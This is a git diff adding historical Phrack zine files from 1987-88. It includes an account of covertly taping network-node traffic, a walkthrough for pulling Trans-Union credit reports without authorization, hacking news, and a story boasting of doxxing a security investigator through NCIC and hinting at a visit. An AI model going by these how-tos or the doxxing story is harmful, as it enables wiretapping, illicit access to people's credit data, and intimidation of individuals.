+Me:   Thanks, I'll let you know if there's any trouble.
+
+
+    So, I ran home, got my VCR (stereo), and picked up another TRC from Trash
+Shack.	I connected  the VCR to	the first  two incoming  lines on the rotary.
+One went  to each channel (left,right).	Since the volume of calls is almost
+consistent, it wasn't necessary to stop the recorder between calls.  I just
+let it run.  I would come back the next day to change the tape.	The VCR was
+placed under the floor in case a tech happened to come by for maintenance.
+These nodes are little computer rooms with air conditioners and raised floors.
+The modems and packet switching equipment are all rack mounted behind glass.
+Also, most of the nodes are unmanned.  What did I get?	Well a lot of the
+logins were 1200, so I never found out what they were.	Still have 'em on tape
+though!	Also a large portion of traffic on both Tymnet and Telenet is those
+little credit card verification machines calling up Visa or Amex.  The
+transaction takes about 30 secs and there are 100's on my tapes.  The rest is
+as follows:
+
+   Easylink	  CompuServe	Quantumlink	3Mmail
+   PeopleLink	Homebanking       USPS		Chrysler parts order
+   Yamaha	    Ford	      Dow Jones
+
+    And a few other misc. systems of little interest.  I'm sure if I was
+persistent, I'd get something a little more interesting.  I spent several
+months trying to figure out my 1200 baud problem.  When I went back down there
+the code had been changed.  Why?  Well I didn't want to find out.  I was out
+of there!  I had told a couple of people who I later found could not be
+trusted.  Oh well.  Better safe than sorry.
+
+
+**************************************
+
+    Well, if you need to reach me,try my VMS at 415-338-7000 box 8130.	But no
+telling how long that will last.  And of course there's always P-80 systems at
+304-744-2253.  Probably be there forever.  Thanks Scan Man, whoever you are.
+Also read my file on telco local loop wiring.  It will help you understand how
+to find the line you are looking for.  It should be called Telcowiring.Txt
+
+	  <<< AGENT STEAL >>>
diff --git a/phrack16/7.txt b/phrack16/7.txt
new file mode 100644
index 0000000..e733b74
--- /dev/null
+++ b/phrack16/7.txt
@@ -0,0 +1,205 @@
+		===== Phrack Magazine presents Phrack 16 =====
+			   ===== File 7 of 12 =====
+
+------------------------------------------------------------------------
+-			  The Disk Jockey			     -
+-			     presents:				-
+-								      -
+-		     Reading Trans-Union Reports:		     -
+-			A lesson in terms used			 -
+-			(A 2af presentation)			  -
+------------------------------------------------------------------------
+
+This file is dedicated to all the phreaks/hacks that were busted in the summer
+of 1987, perhaps one of the most crippling summers ever for us.
+
+Preface:
+-------
+     Trans-Union is a credit service much like CBI, TRW or Chilton, but offers
+more competitive rates, and is being used more and more by many credit
+checking agencies.
+
+Logging in:
+----------
+     Call one of the Trans Union dial-ups at 300,E,7,1, Half Duplex. Such a
+dial-up is 314-XXX-XXXX.  After connecting, hit Ctrl-S.	The system will echo
+back a 'GO ' and then awaits you to begin the procedure of entering the
+account and  password, then  mode, i.e.:  S F1111,111,H,T.   The system	will
+then  tell  you	what  database	you  are  logged  on  to,  which  is	mostly
+insignificant  for your use.  To  then pull  a	report,	you  would  type  the
+following:  P JONES,JIM* 2600,STREET,CHICAGO,IL,60604** <Ctrl-S>.   The name
+is  Jim Jones, 2600 is his street address, street is the  street name, Chicago
+is the city, IL is the state, 60604 is the zip.
+
+The Report:
+----------
+     The report will come out, and will look rather odd, with all types of
+notation.  An example of a Visa card would be:
+
+SUB NAME/ACCT#	SUB#	OPEND	HICR DTRP/TERM BAL/MAX.DEL PAY.PAT   MOP
+
+CITIBANK	 B453411  3/87	$1000	9/87A	$0	 12111     R01
+4128XXXXXXXXX		$1500		5/87	$120
+
+
+Ok, Citibank is the issuing bank.  B453411 is their subscriber code.  3/87 is
+when the account was opened.  HICR is the most that has been spent on that
+card.  9/87 is when the report was last updated (usually monthly if active).
+$1000 is the credit line.  $0 is the current balance.  12111 is the payment
+pattern, where 1=pays in 30 days and 2=pays in 60 days. R01 means that it is a
+"Revolving" account, meaning that he can make payments rather than pay the
+entire bill at once.  4128-etc is his account number (card number).  $1500 is
+his credit line.  5/87 is when he was late on a payment last.  $120 is the
+amount that he was late with.
+
+Here is a list of terms that will help you identify and understand the reports
+better:
+
+ECOA Inquiry and Account Designators
+------------------------------------
+I Individual account for sole use of applicant
+C Joint spousal contractual liability
+A Authorized user of shared account
+P Participant in use of account that is neither C nor A
+S Co-signer, not spouse
+M Maker primarily liable for account, co-signer involved
+T Relationship with account terminated
+U Undesignated
+N Non-Applicant spouse inquiry
+
+Remarks and FCBA Dispute Codes
+------------------------------
+AJP Adjustment pending
+BKL Bankruptcy loss
+CCA Consumer counseling account
+CLA Placed for collection
+CLO Closed to further purchases
+CTS Contact Subscriber
+DIS Dispute following resolution
+DRP Dispute resolution pending
+FCL Foreclosure
+MOV Moved, left no forwarding address
+ND  No dispute
+PRL Profit and loss write-off
+RFN Account refinanced
+RLD Repossession, paid by dealer
+RLP Repossession, proceeds applied towards debt
+RPO Repossession
+RRE Repossession, redeemed
+RS  Dispute resolved
+RVD Returned voluntarily, paid by dealer
+RVN Returned voluntarily
+RVP Returned voluntarily, proceeds go towards debt
+RVR Returned voluntarily, redeemed
+SET Settled for less than full balance
+STL Plate (card) stolen or lost
+TRF Transferred to another office
+
+Type of Account
+---------------
+O Open account (30 or 90 days)
+R Revolving or option account (open-end)
+I Installment (fixed number of payments)
+M Mortgage
+C Check credit (line of credit at a bank)
+
+Usual Manner of Payment
+-----------------------
+00 Too new to rate; approved, but not used or not rated
+01 Pays (or paid) within 30 days of billing, pays accounts as agreed
+02 Pays in more than 30 days, but not more than 60 days
+03 Pays in more than 60 days, but not more than 90 days
+04 Pays in more than 90 days, but not more than 120 days
+05 Pays in 120 days or more
+07 Makes payments under wage earner plan or similar arrangement
+08 Repossession
+8A Voluntary repossession
+8D Legal repossession
+8R Redeemed repossession
+09 Bad debt; placed for collection; suit; judgement; skip
+9B Placed for collection
+UR Unrated
+UC Unclassified
+
+Kinds of Business Classification
+-------------------------------
+A Automotive
+B Banks
+C Clothing
+D Department and variety
+F Finance
+G Groceries
+H Home furnishings
+I Insurance
+J Jewelry and cameras
+K Contractors
+L Lumber, building materials
+M Medical and related health
+N National credit card
+O Oil and national credit card
+P Personal services other than medical
+Q Mail order houses
+R Real estate and public accommodations
+S Sporting goods
+T Farm and garden supplies
+U Utilities and fuel
+V Government
+W Wholesale
+X Advertising
+Y Collection services
+Z Miscellaneous
+
+Type of Installment Loan
+------------------------
+AF Appliance/Furniture
+AP Airplane
+AU Automobile
+BT Boat
+CA Camper
+CL Credit line
+CM Co-maker
+CO Consolidation
+EQ Equipment
+FH FHA contract loan
+FS Finance statement
+HI Home improvement
+IN Insurance
+LE Leases
+MB Mobile home
+MC Miscellaneous
+MT Motor home
+PI Property improvement plan
+PL Personal loan
+RE Real estate
+ST Student loan
+SV Savings bond, stock, etc.
+US Unsecured
+VA Veteran loan
+
+Date Codes
+----------
+A Automated, most current information available
+C Closed date
+F Repossessed/Written off
+M Further updates stopped
+P Paid
+R Reported data
+S Date of last sale
+V Verified date
+
+Employment Verification Indicator
+---------------------------------
+D Declined verification
+I Indirect
+N No record
+R Reported, but not verified
+S Slow answering
+T Terminated
+V Verified
+X No reply
+
+
+Hope  this helps.  Anyone  that has used  Trans-Union will  surely  appreciate
+this, as the result codes are sometimes hard to decipher.
+
+						     -The Disk Jockey
diff --git a/phrack16/8.txt b/phrack16/8.txt
new file mode 100644
index 0000000..d6fffbb
--- /dev/null
+++ b/phrack16/8.txt
@@ -0,0 +1,69 @@
+		      #### PHRACK PRESENTS ISSUE 16 ####
+		   ^*^*^*^Phrack World News, Part 1^*^*^*^
+			    **** File 8 of 12 ****
+
+
+>From the 9/16 San Francisco Chronicle, page A19:
+
+GERMAN HACKERS BREAK INTO NASA NETWORK (excerpted)
+
+Bonn
+	A group of West German computer hobbyists broke into an international
+computer network of the National Aeronautics and Space Administration and
+rummaged freely among the data for at least three months before they were
+discovered, computer enthusiasts and network users said yesterday.
+
+	An organization in Hamburg called the Chaos Computer Club, which
+claimed to be speaking for an anonymous group that broke into the network,
+said the illicit users managed to install a "Trojan horse," and gain entry
+into 135 computers on the European network.
+
+	A "Trojan  Horse" is a	term for  a  permanent	program	that  enables
+amateur computer enthusiasts  [as opposed  to professionals?], or "hackers,"
+to use a password to bypass  all the security  procedures of a system and gain
+access to all the data in a target computer.
+
+[Actually, this type of program is a 'back door' or a 'trap door.' The group
+may very well have *used* a Trojan horse to enable them to create the back
+door, but it probably wasn't a Trojan horse per se.  A Trojan horse is a
+program that does something illicit and unknown to the user in addition to its
+expected task.	See Phrack xx-x, "Unix Trojan Horses," for info on how to
+create a Trojan horse which in turn creates a trap door into someone's
+account.]
+
+	The NASA network that was broken into is called the Space Physics
+Analysis Network [ooh!] and is chiefly designed to provide authorized
+scientists and organizations with access to NASA data.	The security system in
+the network was supplied by an American company, the Digital Equipment Corp.
+[Probably DECNET.  Serves them right.]	Users said the network is widely used
+by scientists in the United States, Britain, West Germany, Japan and five
+other countries and does not carry classified information.
+
+	A Chaos club spokesman, Wau Holland, denied that any data had been
+changed.  This, he said, went against "hacker ethics."
+
+	West German television reports said that computer piracy carries a
+penalty of three years in prison in West Germany.  The government has not said
+what it plans to do.
+
+	The Chaos club clearly views its break-in as a major coup.  Holland,
+reached by telephone in Hamburg, said it was "the most successful running of a
+Trojan horse" to his knowledge, and the club sent a lengthy telex message to
+news organizations.
+
+	It said the "Trojan horse" was spotted by a user in August, and the
+infiltrating group then decided to go public because "they feared that they
+had entered the dangerous field of industry espionage, economic crime, East-
+West conflict...and the legitimate security interests of high-tech
+institutions."
+
+	The weekly magazine Stern carried an interview with several anonymous
+hobbyists who showed how they gained access to the network.  One described his
+excitement when for the first time he saw on his screen, "Welcome to the NASA
+headquarters VAX installation."
+
+	According to Chaos, the hobbyists discovered a gap in the Digital VAX
+systems 4.4 and 4.5 and used it to install their "Trojan Horse."
+
+[Excerpted and Typed by Shooting Shark.	Comments by same.]
+
diff --git a/phrack16/9.txt b/phrack16/9.txt
new file mode 100644
index 0000000..1c63e9f
--- /dev/null
+++ b/phrack16/9.txt
@@ -0,0 +1,51 @@
+		      #### PHRACK PRESENTS ISSUE 16 ####
+		   ^*^*^*^Phrack World News, Part 2^*^*^*^
+			    **** File 9 of 12 ****
+
+[Ed's Note:  CertainThings in the article have been blanked (XXXXX) at the
+request of the author]
+
+		The Story of the Feds on XXXXXXX BBS
+		By The Mad Phone Man
+
+	Returninghome one afternoon with a friend, I knew something wasn't
+right when I walked into the computer room.  I see a "Newuser" on the board...
+and the language he's using is... well "Intimidating"...
+
+"I want you all to know I'm with the OCC task force and we know who you are...
+we are going to have a little get-together and 'talk' to you all."
+
+     Hmmm... a loser?... I go into chat mode... "Hey dude, what's up?" I ask.
+"Your number asshole" he says.... Well, fine way to log on to a board if I do
+say.... "Hey, you know I talked to you and I know who you are.." "Oh
+yeah...Who am I?." he hesitates and says... "Well uh.. you used to work for
+Sprint didn't you?"
+   I say, "No, you've got me confused with someone else I think, I'm a junior
+in high school."
+	"Ohyeah?.. You got some pretty big words for a high school kid," he
+says....
+	"Well, in case you didn't know, they teach English as a major these
+days...."
+	He says... "Do you really want to know which LD company I'm with?"
+	I say "NO, but if it will make you happy, tell me."
+	He  says  MCI.	(Whew! I  don't use  them)... "Well you're  outta luck
+asshole, I pay for my calls, and I don't use MCI."  He's dumbfounded.
+	I wish him the worst as he asks	me to	leave his rather  threatening
+post up on my board and we hang up on him.
+
+	Now, I'm half paralyzed... hmmm.... Check his info-form... he left a
+number in 303... Denver.... I grab the phone and call it.. It's the Stromberg
+Telephone company... Bingo.. I've got him.
+	I search my user files and come up with a user called "Cocheese" from
+there, and I voice validated him, and he said he worked for a small telco
+called Stromberg... I'm onto him now.
+	Later in the week, I'm in a telco office in a nearby major city, I
+happen	to  see a book, marked "Confidential  Employee	Numbers for AT&T."  I
+thumb thru and lo and behold, an R.F. Stromberg works at  an office of AT&T in
+Denver, and I can't cross  reference him to  an office. (A sure sign he's in
+security).  Well, not to be out-done by this loser... I dial up NCIC and check
+for a group search for	a driver's licence for him... Bingo.  Licence number,
+cars he owns, his SS  number, and a cross reference of the licence files finds
+his wife, two kids and a boat registered to him.
+	I've never called him back, but If I do have any trouble with him, I'm
+gonna pay a little visit to Colorado....
diff --git a/phrack17/1.txt b/phrack17/1.txt
new file mode 100644
index 0000000..cca311a
--- /dev/null
+++ b/phrack17/1.txt
@@ -0,0 +1,50 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                               Phrack Seventeen
+                                07 April 1988
+
+                   File 1 of 12 : Phrack XVII Introduction
+
+     It's been a long time, but we're back.  After two successful releases
+under the new editorship, Taran King told us that with his vacation from
+school, he'd be able to put Phrack Seventeen together.  His plans soon
+changed, and Seventeen was now our responsibility again.  Procrastination set
+in, and some difficulty was encountered in compiling the files, but we finally
+did it and here it is.
+
+     There's a lot of good material in this issue, and we're lucky enough to
+have PWN contributions from several sources, making it a true group effort.
+Since The Mad Chemist and Sir Francis Drake, as well as myself, are moving on
+to other things, the editorship of Phrack Inc. may be changing with the
+release of Phrack Eighteen.  Regardless of what direction the publication
+takes, I know that I will have no part in the creation of the next issue, so
+I'd like to mention at this time that my involvement with the magazine, first
+as a contributor and later as a contributing editor, has been fun.  Phrack
+will go on, I'm sure, for another seventeen issues at least, and will continue
+to be a primary monument to the vitality of the hacker culture.
+
+                                              -- Shooting Shark
+                                                 Contributing Editor
+
+     Phrack XVII Table of Contents
+     -----------------------------
+
+#       Title                              Author                 Size
+----    -----                              ------                 ----
+17.1    Phrack XVII Introduction           Shooting Shark         3K
+17.2    Dun & Bradstreet Report on AT&T    Elric of Imrryr        24K
+17.3    D&B Report on Pacific Telesis      Elric of Imrryr        26K
+17.4    Nitrogen-Trioxide Explosive        Signal Substain        7K
+17.5    How to Hack Cyber Systems          Grey Sorcerer          23K
+17.6    How to Hack HP2000's               Grey Sorcerer          3K
+17.7    Accessing Government Computers     The Sorceress          9K
+17.8    Dial-Back Modem Security           Elric of Imrryr        11K
+17.9    Data Tapping Made Easy             Elric of Imrryr        4K
+17.10   PWN17.1 Bust Update                Sir Francis Drake      3K
+17.11   PWN17.2 "Illegal" Hacker Crackdown The $muggler           5K
+17.12   PWN17.3 Cracker are Cheating Bell  The Sorceress          8K
+
diff --git a/phrack17/10.txt b/phrack17/10.txt
new file mode 100644
index 0000000..348fcea
--- /dev/null
+++ b/phrack17/10.txt
@@ -0,0 +1,99 @@
+                      #### PHRACK PRESENTS ISSUE 17 ####
+
+                  ^*^*^*^ Phrack World News, Part 1 ^*^*^*^
+
+                           **** File 10 of 12 ****
+
+
+                  -   P H R A C K   W O R L D   N E W S   -
+                    (Mainly Compiled By Sir Francis Drake)
+
+                                    2/1/88
+
+
+BUST UPDATE
+===========
+
+     All the people busted by the Secret Service last July were contacted in
+September and asked if they "wanted to talk."  No one but Solid State heard
+from the S.S. after this.  Solid State was prosecuted and got one year
+probation plus some required community service.  The rest:  Ninja NYC, Bill
+>From RNOC, Oryan QUEST, etc. are still waiting to hear.  Some rumors have gone
+around that Oryan QUEST has cooperated extensively with the feds but I have no
+idea about the validity of this.  The following is a short interview with
+Oryan QUEST.  Remember that QUEST has a habit of lying.
+
+PHRACK:  Did you hear from the SS in September?  It seems everybody else has.
+
+QUEST:  No.  I haven't heard from them since I was busted.  Maybe they forgot
+        me.
+
+P:  What's your lawyer think of your case?
+
+Q:  He says lay low.  He says it's no problem because of my age.
+
+P:  What do your parents think?
+
+Q:  They were REALLY pissed for about a week but then they relaxed.  I mean I
+    think my parents knew I went through enough... I mean I felt like shit.
+
+P:  Do you plan to keep involved in Telecom legit or otherwise?
+
+Q:  Uhh, I wanna call boards... I mean I can understand why a sysop wouldn't
+    give me an access but... I'm thinking of putting a board up, a secure
+    board just to stay in touch ya know?  Cause I had a lot of fun I mean I
+    just don't want to get busted again.
+
+P:  Any further words of wisdom?
+
+Q:  No matter what anyone says I'm *ELITE*.  NOOOO don't put that.
+
+P:  Yes I am.
+
+Q:  No I don't want people to think I'm a dick.
+
+P:  Well...
+
+Q:  You're a dick.
+
+
+- On a completely different note, Taran King who as some of you know was
+  busted, is going to be writing a file for Phrack about what happened real
+  soon now.
+
+
+MEDIA
+=====
+
+     The big media thing has been scare stories about computer viruses,
+culminating in a one page Newsweek article written by good old Sandza and
+friends.  John Markoff of the San Francisco Examiner wrote articles on
+viruses, hacking voice mailboxes, and one that should come out soon about the
+July Busts (centering on Oryan QUEST).  A small scoop:  He may be leaving for
+the New York Times or the San Jose Mercury.
+
+     Phreak media wise things have been going downhill.  Besides PHRACK (which
+had a bad period but hopefully we're back for good) there is 2600, and
+Syndicate Report.  Syndicate Report is dead, although their voice mail system
+is up.  Sometimes.  2600 has gone from a monthly magazine to a quarterly one
+because they were losing so much money.  One dead and 2 wounded.
+
+
+MISCELLANEOUS
+=============
+
+     Taran King and Knight Lightning are having a fun time in their fraternity
+at University of Missouri.  Their respective GPA's are 2.1 and 2.7
+approximately.... Phantom Phreaker and Doom Prophet are in a (punk/metal)
+band... Lex Luthor is alive and writing long articles for 2600... Sir Francis
+Drake sold out and wrote phreak articles for Thrasher... Jester Sluggo has
+become vaguely active again...
+
+
+CONCLUSION
+==========
+
+Less and less people are phreaking, the world is in sorry shape, and I'm going
+to bed.  Hail Eris.
+
+sfd
diff --git a/phrack17/11.txt b/phrack17/11.txt
new file mode 100644
index 0000000..48dafc9
--- /dev/null
+++ b/phrack17/11.txt
@@ -0,0 +1,107 @@
+                      #### PHRACK PRESENTS ISSUE 17 ####
+
+                  ^*^*^*^ Phrack World News, Part 2 ^*^*^*^
+
+                           **** File 11 of 12 ****
+
+
+                          "Illegal Hacker Crackdown"
+               from the California Computer News - October 1987
+                      Article by Al Simmons - CCN Editor
+
+Hackers beware!
+
+Phone security authorities, the local police, and the Secret Service have been
+closing down on illegal hacking - electronic thievery - that is costing the
+long-distance communications companies and their customers millions of dollars
+annually.  In the U.S., the loss tally on computer fraud, of all kinds, is now
+running between $3 billion and $5 a year, according to government sources.
+
+         "San Francisco D.A. Gets First Adult Conviction for Hacking"
+                  (After about 18 years, it's a about time!)
+
+San Francisco, District Attorney Arlo Smith recently announced the first
+criminal conviction in San Francisco Superior Court involving an adult
+computer hacker.
+
+In a report released August 31, the San Francisco District Attorney's office
+named defendant Steve Cseh, 25, of San Francisco as having pled guilty earlier
+that month to a felony of "obtaining telephone services with fraudulent
+intent" (phreaking) by means of a computer.
+
+Cseh was sentenced by Superior Court Judge Laurence Kay to three years
+probation and ordered to preform 120 hours of community service.
+
+Judge Kay reduced the offense to a misdemeanor in light of Cseh's making full
+restitution to U.S. Sprint - the victim phone company.
+
+At the insistence of the prosecuting attorney, however, the Court ordered Cseh
+to turn his computer and modem over to U.S. Sprint to help defray the phone
+company's costs in detecting the defendant's thefts.  (That's like big money
+there!)
+
+A team of investigators from U.S. Sprint and Pac Tel (the gestapo) worked for
+weeks earlier this year to detect the hacking activity and trace it to Cseh's
+phone line, D.A. Arlo Smith said.
+
+The case centered around the use of a computer and its software to illegally
+acquire a number of their registered users to make long-distance calls.
+
+Cseh's calls were monitored for a three-week period last March.  After tracing
+the activity to Cseh's phone line, phone company security people (gestapo
+stormtroopers) were able to obtain legal authority, under a federal phone
+communications statute, to monitor the origin and duration of the illegal
+calls.
+
+Subsequently, the investigators along with Inspector George Walsh of the San
+Francisco Police Dept. Fraud Detail obtained a search warrant of Cseh's
+residence.  Computer equipment, a software dialing program, and notebooks
+filled with codes and phone numbers were among the evidence seized, according
+to Asst. D.A. Jerry Coleman who prosecuted the case.
+
+U.S Sprint had initially reported more than $300,000 in losses from the use of
+their codes during the past two years; however, the investigation efforts
+could only prove specific losses of a lesser amount traceable to Cseh during
+the three-week monitoring period.
+
+"It is probable that other computer users had access to the hacked Sprint
+codes throughout the country due to dissemination on illegal computer bulletin
+boards," added Coleman (When where BBS's made illegal Mr. Coleman?)
+
+          "Sacramento Investigators Breakup Tahoe Electronic Thefts"
+
+Meanwhile, at South Shore Lake Tahoe, Secret Service and phone company
+investigators arrested Thomas Gould Alvord, closing down an electronic theft
+ring estimated to have rung up more than $2 million in unauthorized calls.
+
+A Sacramento Bee story, filed by the Bee staff writers Ted Bell and Jim Lewis,
+reported that Alvord, 37, was arrested September 9, on five felony counts of
+computer hacking of long-distance access codes to five private telephone
+companies.
+
+Alvord is said to have used an automatic dialer, with computer programmed
+dialing formulas, enabling him to find long-distance credit card numbers used
+by clients of private telephone companies, according to an affidavit filed in
+Sacramento's District Court.
+
+The affidavit, filed by William S. Granger, a special agent of the Secret
+Service, identified Paula Hayes, an investigator for Tel-America of Salt Lake
+City, as the undercover agent who finally brought an end to Alvord's South
+Shore Electronic Co. illegal hacking operation. Hayes worked undercover to
+purchase access codes from Alvord.
+
+Agent Garanger's affidavit lists U.S. Sprint losses at $340,000 but Sprint
+spokesman Jenay Cottrell said that figure "could grow considerably," according
+to the Bee report.
+
+One stock brokerage firm, is reported to have seen its monthly Pacific Bell
+telephone bill climb steadily from $3,000 in April to $72,000 in August.  The
+long-distance access codes of the firm were among those traced to Alvord's
+telephones, according to investigators the Bee said.
+
+Alvord was reportedly hacking access codes from Sprint, Pacific Bell, and
+other companies and was selling them to truck drivers for $60 a month.  Alvord
+charged companies making overseas calls and larger businesses between $120 and
+$300 a month for the long-distance services of his South Shore Electronics Co.
+
+>From The $muggler
diff --git a/phrack17/12.txt b/phrack17/12.txt
new file mode 100644
index 0000000..d2ced26
--- /dev/null
+++ b/phrack17/12.txt
@@ -0,0 +1,145 @@
+                      #### PHRACK PRESENTS ISSUE 17 ####
+
+                  ^*^*^*^ Phrack World News, Part 3 ^*^*^*^
+
+                           **** File 12 of 12 ****
+
+
+  +-------------------------------------------------------------------------+
+  -[ PHRACK XVII ]-----------------------------------------------------------
+
+                   "The Code Crackers are Cheating Ma Bell"
+           Typed by the Sorceress from the San Francisco Chronicle
+                            Edited by the $muggler
+
+             The Far Side..........................(415)471-1138
+             Underground Communications, Inc.......(415)770-0140
+
+  +-------------------------------------------------------------------------+
+In California prisons, inmates use "the code" to make free telephone calls
+lining up everything from gun running jobs to visits from grandma.
+
+In a college dormitory in Tennessee, students use the code to open up a
+long-distance line on a pay phone for 12 straight hours of free calls.
+
+In a phone booth somewhere in the Midwest, a mobster uses the code to make
+untraceable calls that bring a shipment of narcotics from South America to the
+United States.
+
+The code is actually millions of different personal identification numbers
+assigned by the nation's telephone companies.  Fraudulent use of those codes
+is now a nationwide epidemic that is costing America's phone companies more
+than $500 million each year.
+
+In the end, most of that cost is passed on to consumers, in the form of higher
+phone rates, analysts say.
+
+The security codes range form multidigit access codes used by customers of the
+many alternative long-distance companies to the "calling card" numbers
+assigned by America Telephone & Telegraph and the 22 local phone companies,
+such as Pacific Bell.
+
+Most of the loss comes form the activities of computer hackers, said Rene
+Dunn, speaking for U.S. Sprint, the third-largest long-distance company.
+
+These technical experts - frequently bright, if socially reclusive, teenagers
+- set up their computers to dial the local access telephone number of one of
+the alternative long-distance firms, such as MCI and U.S. Sprint.  When the
+phone answers, a legitimate customer would normally punch in a secret personal
+code, usually five digits, that allows him to make his call.
+
+Hackers, however, have devised computer programs that will keep firing
+combinations of numbers until it hits the right combination, much like a
+safecracker waiting for the telltale sound of pins and tumblers meshing.
+
+Then the hacker- known in the industry as a "cracker" because he has cracked
+the code- has full access to that customer's phone line.
+
+The customer does not realize what has happened until a huge phone bill
+arrives at the end of the month. By that time, his access number and personal
+code have been tacked up on thousands of electronic bulletin boards throughout
+the country, accessible to anyone with a computer, a telephone and a modem,
+the device that allows the computer to communicate over telephone lines.
+
+"This is definitely a major problem," said one telephone security expert, who
+declined to be identified.  "I've seen one account with a $98,000 monthly
+bill."
+
+One Berkeley man has battled the telephone cheats since last fall, when his
+MCI bill showed about $100 in long-distance calls he had not made.
+
+Although MCI assured him that the problem would be taken care of, the man's
+latest bill was 11 pages long and has $563.40 worth of long-distance calls.
+Those calls include:
+
+[]  A two-hour call to Hyattsville, Maryland, on January 22.  A woman who
+    answered the Hyattsville phone said she had no idea who called her house.
+
+[]  Repeated calls to a dormitory telephone at UCLA.  The student who answered
+    the phone there said she did not know who spent 39 minutes talking to her,
+    or her roommate, shortly after midnight on January 23.
+
+[]  Calls to dormitory rooms at Washington State University in Pullman and to
+    the University of Colorado in Boulder.  Men who answered the phones there
+    professed ignorance of who had called them or of any stolen long-distance
+    codes.
+
+The Berkeley customer, who asked not to be identified, said he reached his
+frustration limit and canceled his MCI account.
+
+The phone companies are pursing the hackers and other thieves with methods
+that try to keep up with a technological monster that is linked by trillions
+of miles of telephone lines.
+
+The companies sometimes monitor customers' phone bills.  If a bill that
+averages about $40 or $50 a month suddenly soars to several hundred dollars
+with calls apparently placed from all over the country on the same day, the
+phone company flags the bill and tries to track the source of the calls.
+
+The FBI makes its own surveillance sweeps of electronic bulletin boards,
+looking for stolen code numbers.  The phone companies occasionally call up
+these boards and post messages, warning that arrest warrants will be coming
+soon if the fraudulent practice does not stop.  Reputable bulletin boards post
+their own warnings to telephone hackers, telling them to stay out.
+
+Several criminal prosecutions are already in the works, said Jocelyne Calia,
+the manager of toll fraud for U.S. Sprint.
+
+If the detectives do not want to talk about their methods, the underground is
+equally circumspect.  "If they (the companies) have effective (prevention)
+methods, how come all this is still going on?" asked one computer expert, a
+veteran hacker who says he went legitimate about 10 years ago.
+
+The computer expert, who identified himself only as Dr. Strange, said he was
+part of the original group of electronic wizards of the early 1970s who
+devised the "blue boxes" complex instruments that emulate the tones of a
+telephone and allowed these early hackers to break into the toll-free 800
+system and call all over the world free of charge.
+
+The new hacker bedeviling the phone companies are simply the result of the
+"technology changing to one of computers, instead of blue boxes" Dr. Strange
+said.  As the "phone company elevates the odds... the bigger a challenge it
+becomes," he said.
+
+A feeling of ambivalence toward the huge and largely anonymous phone companies
+makes it easier for many people to rationalize their cheating.  A woman in a
+Southwestern state who obtained an authorization code from her boyfriend said,
+through an intermediary, that she never really thought of telephone fraud as a
+"moral issue."  "I don't abuse it," the woman said of her newfound telephone
+privilege.  "I don't use it for long periods of time - I never talk for more
+than an hour at a time - and I don't give it out to friends."  Besides, she
+said, the bills for calls she has been making all over the United States for
+the past six weeks go to a "large corporation that I was dissatisfied with.
+It's not as if an individual is getting the bills."
+
+There is one place, however, where the phone companies maybe have the upper
+hand in their constant war with the hackers and cheats.
+
+In some prisons, said an MCI spokesman, "we've found we can use peer pressure.
+Let's say we restrict access to the phones, or even take them out, and there
+were a lot of prisoners who weren't abusing the phone system.  So the word
+gets spread to those guys about which prisoner it was that caused the
+telephones to get taken out.  Once you get the identification (of the
+phone-abusing prisoner) out there, I don't think you have to worry much" the
+spokesman said.  "There's a justice system in the prisons, too."
+
diff --git a/phrack17/2.txt b/phrack17/2.txt
new file mode 100644
index 0000000..08d7e72
--- /dev/null
+++ b/phrack17/2.txt
@@ -0,0 +1,461 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                              Phrack  Seventeen
+                                07 April 1988
+
+                File 2 of 12 : Dun & Bradstreet Report on AT&T
+
+
+
+       AT&T Credit File, taken from Dun & Bradstreet by Elric of Imrryr
+
+
+
+
+                        DUN'S FINANCIAL RECORDS
+                           COPYRIGHT (C) 1987
+                    DUN & BRADSTREET CREDIT SERVICE
+Name & Address:
+      AMERICAN TELEPHONE AND TELEGRAPH          Trade-Style Name:
+      550 Madison Ave                           AT & T
+      NEW YORK, NY 10022
+
+      Telephone: 212-605-5300
+
+      DUNS Number: 00-698-0080
+
+      Line of Business: TELECOMMUNICATIONS SVCS TELE
+
+      Primary SIC Code: 4811
+      Secondary SIC Codes: 4821 3661 3357 3573 5999
+
+      Year Started:  1885                 (12/31/86)  COMBINATION FISCAL
+      Employees Total:     317,000        Sales:           34,087,000,000
+      Employees Here:        1,800        Net Worth:       14,462,000,000
+
+      This is a PUBLIC company
+
+
+      12/31/86 COMBINATION FISCAL
+      (Figures are in THOUSANDS)
+
+      FINANCIALS                                        %     COMPANY    INDST
+                                           COMPANY    CHANGE     %      NORM %
+      Cash. . . . . . . . . . . . .     2,602,000      17.5      6.7      9.0
+      Accounts Receivable . . . . .     7,820,000     (13.1)    20.1      5.7
+      Notes Receivable. . . . . . .          ----      ----     ----      0.2
+      Inventory . . . . . . . . . .     3,519,000     (26.1)     9.1      1.3
+      Other Current Assets. . . . .     1,631,000      72.0      4.2      5.8
+
+      Total Current Assets. . . . .    15,572,000      (8.0)    40.0     22.0
+
+      Fixed Assets. . . . . . . . .    21,078,000      (4.7)    54.2     35.6
+      Other Non-current Assets. . .     2,233,000      55.9      5.7     42.4
+
+      Total Assets. . . . . . . . .    38,883,000      (3.9)   100.0    100.0
+
+      Accounts Payable. . . . . . .     4,625,000      (6.4)    11.9      4.2
+      Bank Loans. . . . . . . . . .          ----      ----     ----      0.2
+
+      Notes Payable . . . . . . . .          ----      ----     ----      1.0
+      Other Current Liabilities . .     6,592,000       0.8     17.0      6.2
+
+      Total Current Liabilities . .    11,217,000      (2.4)    28.8     11.6
+
+      Other Long Term Liab. . . . .    13,204,000      38.2     34.0     46.8
+      Deferred Credits. . . . . . .          ----      ----     ----      6.4
+      Net Worth . . . . . . . . . .    14,462,000      (1.2)    37.2     35.2
+
+      Total Liabilities & Worth. .     38,883,000      (3.9)   100.0    100.0
+
+      Net Sales . . . . . . . . . .    34,087,000      (2.4)   100.0    100.0
+      Gross Profit. . . . . . . . .    15,838,000      ----     46.5     40.1
+      Net Profit After Tax. . . . .       139,000     (91.1)     0.4     15.3
+      Dividends/Withdrawals . . . .     1,371,000      (0.9)     4.0      7.7
+      Working Capital . . . . . . .     4,355,000     (19.8)    ----     ----
+
+      RATIOS                                     %    ---INDUSTRY QUARTILES---
+                                      COMPANY  CHANGE   UPPER  MEDIAN   LOWER
+          (SOLVENCY)
+
